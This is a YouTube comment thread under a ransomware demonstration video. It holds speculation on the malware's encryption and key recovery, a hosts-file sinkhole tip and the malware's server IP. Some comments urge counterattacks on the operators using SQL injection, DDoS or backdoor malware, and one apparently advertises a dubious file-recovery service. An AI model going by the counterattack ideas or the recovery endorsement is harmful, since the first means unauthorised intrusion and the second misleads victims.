I take a quick look at a new version of another file encrypting ransomware trojan. Unlike previous versions, this one leaves (nearly) no way to decrypt your files without the correct password.
This ransomware is now obsolete. The IP the webserver this runs on (37.221.162.51) is now no longer available. If you really want to, I suppose you can route 37.221.162.51 to localhost in your hostsfile. I got a sample of this is and this is quick fix as it will not encrypt anything if it can't properly send the code.
+don brathuhn It doesn't work. This person has the decency to not fuck you if they make no money from you. This is obsolete, so it doesn't matter either way. (operating server 37.221.162.51 is now shut down)
I really enjoy watching these types of videos in the morning, generally while drinking a Monster, or Redbull. Except, it's 1PM. I overslept, I'm too fucking sick to go to the store to get anything, and it would taste like shit, most likely. Sorry for telling you all my whole life story.
It wouldn't make any difference. Create a text file, put words in it. Then, change it's extenstion to something like .data, or like in the video, .txt.crypt. If you try to open it with Notepad, it'll show the file's contents just fine.
This is why I ghost copy my drive to a redundant RAID server every night, you can build one for just backups, ghost copies etc. for less than $200 then if your computer gets ransomed, you just re-install and and since it is a ghost copy restore it to right before your machine was ransomed
What you could do is disassemble the file and find out how it works. Then find where the data is in memory and then execute the file through preferably a debugger and you shall find the key. Although regular execution would not work because it will only be in memory a fraction of a second dependant on speeds and opcodes.
Which ransomware was that fake AV that made your computer lock up, flashed the screen red, and played this annoying electrical sound through the speakers? I remember seeing it on Rogueamps channel.
hmm, maybe it also effect program because it think it might have to do with a problem you are trying to resolve, point still stands system restore should not effect pictures, documents, music, etc
I went to the destination IP that the .php file lies on in an attempt to see how it does it, but it asks for a log on, with the description being "bit-coin mining proxy". huh needless to say I couldn't log-in, and it booted me to a page saying "Sorry, I don't know you."
I wonder how it can display "Password accepted". Does it check with the server? A file that it decrypts with known contents to test the password? Or is the password still saved on the system?
Where would you generally get infected by a ransomware? Would the person who made it have disguised it as something too good to be true and sent it to you?
What would happen if this was run on a machine without an internet connection? I doubt files are being uploaded to a server and changed there, or you could just send huge files at the server constantly, the encryption has to be in that exe, surely? which would mean someone like xylitol could make a fix with a bit of ollydbging.
Who ever said I was a white hat D: I am curious to see if I can reverse engineer it, I mean I have several books on cryptology and I am currently developing a system of encryption, but I need something which seems like a challenge :3
***** Why are you criticising her for liking Roblox? Is it because you hate Roblox? I could also say that your grammar is bad, as that "sentence" - if I could even call it that - doesn't make sense AT ALL. Roblox also has nothing to DO with WireShark. Come on, at least step up your game a little bit. Or are you just gonna write another complaint comment, with your one subscriber (probably you) and your 10 views?
Check Google. I'm pretty sure it is a rogue so go on google or something and look it up. Generally when you type in the name of a rogue everything that comes up is warnings and bad reviews from websites like BleepingComputer.
I wonder if it's using RC4 or some other weaksauce crypto with an identical keystream for every file. In that case if you have a backup of any of the files, you can recover the keystream, up to the size of that file, with some xor action. Then xor the keystream with the ciphertext to get back you precious crazy Russian porn.
Do you know which type of encryption method it uses? This seems very interesting and I feel like I would like to take the challenge to decrypt it :) I mean pm me a link to where I can download this so I can take a crack at it :O
***** but there antivirus or protection will block it and since they able to design something like this they r bound to be grey hat hackers so itll be easy for them to counter the roughe but SQL injects can bypass there defense systems, and denial of service will stop them from destroyin ur data for sendin them a Sql
a good one would be the Trojan.zeroaccess, if you got experience with it. Because zeroacess basically sneakly gets into there sytem, deactivates internet security then it opens a backdoor and installs a tonne of other viruses which crashe there computer. With the backdoor u basically get control over the system and u can get the passkey to unlock ur system by urself from there computer :D
Mustang is right. The way this works is by generating a private seed to encrypt with, which is what that identification number is, so say each install's password seed is: identifiaction number + "xOdpdDFPG40fxZ", so if you decompiled it you could get the seed, and thus, the password.
+.Float what's preventing this thing from having a preset pattern, if the password does not match the pattern, why interact with the server at all? or you can enter an incorrect password with the correct pattern, it would contact the server then realize it's the incorrect password. nothing is preventing the owner from keeping the key and the parameters on a private disposable server and sending it when the password is correct.
A ransomware
that actually
delivers
If I knew myself, but this comment is old.
Just forget it, this comment is old.
I read it as a haiku, thank god I renewed my bamboozle insurance yesterday.
@@marimeme indeed, it is
@@youtube.commentator yes it is very old indeed
"And of course, we have a JPG."
"CRAZY RUSSIAN PORN"
Rogueamp, you classy, classy, man.
I'll send them BankInfo.txt.exe.
yea
Wow wasnt expecting to see a toontown fan like me here XD
NOOOOOOO! The scry computr ting rooned me shmexy pr0nz!
This ransomware is now obsolete.
The IP the webserver this runs on (37.221.162.51) is now no longer available.
If you really want to, I suppose you can route 37.221.162.51 to localhost in your hostsfile. I got a sample of this is and this is quick fix as it will not encrypt anything if it can't properly send the code.
I can respect that.
Won't encrypt if it can't make sure it can unencrypt.
"CRAZY RUSSIAN PORN" 😆 fucking brilliant!!
i get that reference 😂😂😂
Change all files to .mp3
*****
I mean before.
+minerinnorway norsk gaming For this occasion before he runs the virus.
+ThePuffin77
What a smart idea!
because then this may happen:
Russian.exe INFECTED
fakeimagedisquised.mp3 SAFE!
Birele uses AES. And I'd imagine it is implemented properly without any vunerabilities.
Send them/him a txt with the Rick roll url
what is the OS used in this video?
is this Windows 7 with the Windows 2000 interface?
What if you have the internet disconnected so the server does not receive the password?
+don brathuhn It doesn't work. This person has the decency to not fuck you if they make no money from you.
This is obsolete, so it doesn't matter either way. (operating server 37.221.162.51 is now shut down)
what if you get it, but have internet off, then restart and turn it on?
@@smasher4291 please try that and let us know
So basically WireShark (or any packet analyzer) toasts this ransomware through and through.
I really enjoy watching these types of videos in the morning, generally while drinking a Monster, or Redbull. Except, it's 1PM. I overslept, I'm too fucking sick to go to the store to get anything, and it would taste like shit, most likely. Sorry for telling you all my whole life story.
someone needs to make a virus that pops up Rickroll every 2 seconds
In case you haven't found it yet, it was Desktop Defender 2010.
It wouldn't make any difference. Create a text file, put words in it. Then, change it's extenstion to something like .data, or like in the video, .txt.crypt. If you try to open it with Notepad, it'll show the file's contents just fine.
you did it, amp. you did the thing. i'm so proud of you.
avast covered that voice with "AVAST HAS SUCCESSFULLY UPDATED!"
both of these are system processes that are essential for your computer to run. do NOT end their processes or system trees.
So rogue's been listening to some Jim Jones
Wow, that's one hell of a trojan 0.0
Your user icon is a work of art
I miss Chad Warden. BALLIN.
This is why I ghost copy my drive to a redundant RAID server every night, you can build one for just backups, ghost copies etc. for less than $200 then if your computer gets ransomed, you just re-install and and since it is a ghost copy restore it to right before your machine was ransomed
1:14 Ballin. Jarl Ballin.
Those are so mainstream now that that isn't really a safe assumption.
What you could do is disassemble the file and find out how it works. Then find where the data is in memory and then execute the file through preferably a debugger and you shall find the key. Although regular execution would not work because it will only be in memory a fraction of a second dependant on speeds and opcodes.
YESSS GIMME DAT CRAZEEEE RUSSUAANNN PPOOORRRNNNNNNNNÑ
Yeah, I love when I see your new videos in my sub box
Those text files made me laugh pretty hard.
Which ransomware was that fake AV that made your computer lock up, flashed the screen red, and played this annoying electrical sound through the speakers? I remember seeing it on Rogueamps channel.
wouldn't there be a key to use, it needs a key to encrypt it right? decompiling it might help us
hmm, maybe it also effect program because it think it might have to do with a problem you are trying to resolve, point still stands system restore should not effect pictures, documents, music, etc
We Fly High You know this. You watch Chad Warden before this video xD?
So the amp found out about chad warden now lol.
I went to the destination IP that the .php file lies on in an attempt to see how it does it, but it asks for a log on, with the description being "bit-coin mining proxy". huh
needless to say I couldn't log-in, and it booted me to a page saying "Sorry, I don't know you."
We fly high
No lie
You know dis
BALLIN
i think you should put that code in the description so that people can remove it easily.
and also, gr8 files
WOMAN IM LOOOOORD OF THE RINGS
Ballin'.
I wonder how it can display "Password accepted". Does it check with the server? A file that it decrypts with known contents to test the password? Or is the password still saved on the system?
Where would you generally get infected by a ransomware? Would the person who made it have disguised it as something too good to be true and sent it to you?
Would it be possible to decrypt a file by comparing the encrypted version to the unencrypted version the criminal sends you?
What would happen if this was run on a machine without an internet connection? I doubt files are being uploaded to a server and changed there, or you could just send huge files at the server constantly, the encryption has to be in that exe, surely? which would mean someone like xylitol could make a fix with a bit of ollydbging.
that ransom ware kills safe mode as well though!!!!
Wouldn't you think that the packet that sends the password would use SSL to prevent people from using sniffers to get the password?
Who ever said I was a white hat D: I am curious to see if I can reverse engineer it, I mean I have several books on cryptology and I am currently developing a system of encryption, but I need something which seems like a challenge :3
That is very cool that you can use wireshark for anything
So? Aren't you a fan of something too?
***** Why are you criticising her for liking Roblox? Is it because you hate Roblox? I could also say that your grammar is bad, as that "sentence" - if I could even call it that - doesn't make sense AT ALL. Roblox also has nothing to DO with WireShark. Come on, at least step up your game a little bit. Or are you just gonna write another complaint comment, with your one subscriber (probably you) and your 10 views?
HashtagBenches Thank you. You didn't have to stand up for me.
Roblox TheTechyButterfly Eh, no problem.
+HashtagBenches This is the internet. Don't take what people say to heart
ballin
I heard on Britc09's site there is a decryption tool
Check Google. I'm pretty sure it is a rogue so go on google or something and look it up. Generally when you type in the name of a rogue everything that comes up is warnings and bad reviews from websites like BleepingComputer.
I wonder if it's using RC4 or some other weaksauce crypto with an identical keystream for every file. In that case if you have a backup of any of the files, you can recover the keystream, up to the size of that file, with some xor action. Then xor the keystream with the ciphertext to get back you precious crazy Russian porn.
Where do you get these ransomwares and rogues? I would like to try some of them on my VM.
Here we go, more ransomware. :P
Hi, keep up to date on this Birele Ransomware? Thanks!
system restore has do with windows installation and registryl it doesn't touch your files
system restore?
Does it send out the password every time the informer starts?
no matter what antimalware/antivirus program you use... there will always be ways around it. Its impossible to block every virus.
Wait, couldn't you just get wire shark and run it again?
I just got a Dell Dimension 3000 series with 600gb just for programming viruses, and Trojans. I spent $30 on the computer.
I could install Linux, but I prefer to be productive. I am a certified Microsoft, apple, and GNU/Linux tech, and for productivity Windows is the best
IT ISSSSSS FUCKED that was so funny
what happens when you run it again? You could spam add.php to see what happens :)
Do you know which type of encryption method it uses? This seems very interesting and I feel like I would like to take the challenge to decrypt it :) I mean pm me a link to where I can download this so I can take a crack at it :O
but what happens if you get it and you send them a DDOS or SQL in that one file ur allowed to send them ?
***** but there antivirus or protection will block it and since they able to design something like this they r bound to be grey hat hackers so itll be easy for them to counter the roughe but SQL injects can bypass there defense systems, and denial of service will stop them from destroyin ur data for sendin them a Sql
That Stupid Guy That Will Slap Your Face Send them the Fagot virus.
It'll infect them AND call them a fagot at the same time.
t-t-t-torture breaker
if i will got infected with this i will send them the Gruel virus or the Internet Secururity rouge
a good one would be the Trojan.zeroaccess, if you got experience with it. Because zeroacess basically sneakly gets into there sytem, deactivates internet security then it opens a backdoor and installs a tonne of other viruses which crashe there computer. With the backdoor u basically get control over the system and u can get the passkey to unlock ur system by urself from there computer :D
I'd be sending something which can blow their machine up, with some kind of overflow
Ctrl+F5 fixed it for me.
all the test files are a reference to Chad Warden lol
You wasn't first...I WAS!
Dammit, i just recorded a whole video of this!
Yeah, I'm sure.
The code is different every time so it's no use.
Looks like their getting their money through bitcoins... They are gonna be impossible to track down... Damn :(
now that's just mean.
crack the program with a decompiler and get the key and the parameters
... It reads it off of a server, and sad server has authencaton. That wouldnt work.
Mustang is right.
The way this works is by generating a private seed to encrypt with, which is what that identification number is, so say each install's password seed is: identifiaction number + "xOdpdDFPG40fxZ", so if you decompiled it you could get the seed, and thus, the password.
+.Float what's preventing this thing from having a preset pattern, if the password does not match the pattern, why interact with the server at all?
or you can enter an incorrect password with the correct pattern, it would contact the server then realize it's the incorrect password.
nothing is preventing the owner from keeping the key and the parameters on a private disposable server and sending it when the password is correct.
Ticha360 What?
So, we can still watch our porn videos. This Ransomware is somewhat nice, I guess.
Try "Emsisoft Harasom Decrypter
maybe it will Decryter this Ramsomware? Let me know? Write Emsisoft Anti Malware
support for the Decrypter!
Sup bitches. It's Chad Warden here.
Good thing I run comodo
No virus will ever come on my PC as long as I have comodo on it :) it has the best behavior blocker ever
he said it generates a random password
so there is no actual password
$300 a lot of money to pay
You're already stupid enough to download ransomware, right?
Oh, I see it's a stupid program that throws up some random message boxes. How nice.
good thing I run linux.
in front of the tmp to download
Nice :D
What is this?
idk 'bout rthdco.exe and smss.exe but if it is under the owner user etc. you MAAAAY wunna end the process
That'sSomeCrazyPorn.jpg.jpg.. Wut.txt
Lol porn.jpg on the desktop
It's pronounced Baigh-real-ayyyyyyyyyyyy lmao
Test.
lol
porn.jpg
or just use Linux.
Lol
OMG jp file
Can you send me a download link (in pm) to this virus so I can test it on a virtual machine
Me 2
*Jones_Tec* is reliable when it comes to recovery of files.he's a genius without any delay.
Put in h ttps://